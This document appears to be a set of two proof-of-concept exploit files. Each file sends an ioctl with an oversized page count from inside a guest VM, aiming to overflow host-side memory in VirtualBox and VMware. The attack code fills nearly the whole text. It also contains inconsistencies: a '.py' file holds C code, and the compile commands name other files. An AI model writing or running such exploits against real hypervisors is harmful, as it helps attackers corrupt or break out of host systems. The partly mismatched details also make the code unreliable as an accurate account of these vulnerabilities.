File: 2021/24573/poc.c
/*
 * PoC for VirtualBox VMMDev shared‐memory overflow (CVE-2021-24573)
 *
 * Opens /dev/vboxvmm and issues SHARED_MEM ioctl with an
 * oversized pageCount, overflowing host VMMDev backend.
 *
 * Compile: gcc -Wall -O2 -o poc_vbox_shmem poc_vbox_shmem.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <stdint.h>

#define VMMDEV_IOCTL_MAGIC      'V'
#define VMMDEV_IOCTL_SHARED_MEM _IOWR(VMMDEV_IOCTL_MAGIC, 4, struct SharedMem)

struct SharedMem {
    uint64_t userAddress; /* guest pointer */
    uint32_t pageCount;   /* number of pages to map */
    uint32_t mapId;       /* returned ID */
};

int main() {
    int fd = open("/dev/vboxvmm", O_RDWR);
    if (fd < 0) { perror("open /dev/vboxvmm"); return 1; }

    struct SharedMem arg;
    arg.userAddress = 0;           /* NULL guest pointer is fine */
    arg.pageCount   = 0xFFFFFFFF;  /* overflow trigger */
    arg.mapId       = 0;

    printf("[+] Sending SHARED_MEM ioctl with pageCount=0x%x\n", arg.pageCount);
    if (ioctl(fd, VMMDEV_IOCTL_SHARED_MEM, &arg) < 0) {
        perror("ioctl SHARED_MEM");
    } else {
        printf("[+] ioctl returned, mapId=0x%x\n", arg.mapId);
        printf("[!] host VMMDev backend may be corrupted\n");
    }

    close(fd);
    return 0;
}

File: 2011/2706/poc.py
/*
 * PoC for VMware vmmemctl shared-memory oversize (CVE-2011-2706)
 *
 * Interacts with the vmmemctl char device inside the guest to
 * request a shared-memory region with an enormous page_count,
 * overflowing host-side bookkeeping.
 *
 * Compile: gcc -o poc_vmmemctl poc_vmmemctl.c
 */

#include <fcntl.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <unistd.h>

// vmmemctl ioctl magic & opcodes (reverse-engineered)
#define VMMEMCTL_MAGIC       'M'
#define VMMEMCTL_CREATE      _IOWR(VMMEMCTL_MAGIC, 2, struct mem_op)
#define VMMEMCTL_REMOVE      _IOWR(VMMEMCTL_MAGIC, 3, struct mem_op)

struct mem_op {
    uint32_t command;      // 2=create, 3=remove
    uint32_t page_count;   // number of pages
    uint64_t page_list;    // guest-side pointer to pages
};

int main() {
    int fd = open("/dev/vmmemctl", O_RDWR);
    if (fd < 0) { perror("open /dev/vmmemctl"); return 1; }

    struct mem_op op;
    op.command    = 2;           // CREATE_SHARED_MEMORY
    op.page_count = 0xFFFFFFFF;  // huge count to overflow host
    op.page_list  = 0;           // NULL list

    printf("[+] Requesting %u pages via VMMEMCTL_CREATE\n", op.page_count);
    if (ioctl(fd, VMMEMCTL_CREATE, &op) < 0) {
        perror("ioctl VMMEMCTL_CREATE");
    } else {
        printf("[+] ioctl returned, host likely corrupted\n");
    }

    close(fd);
    return 0;
}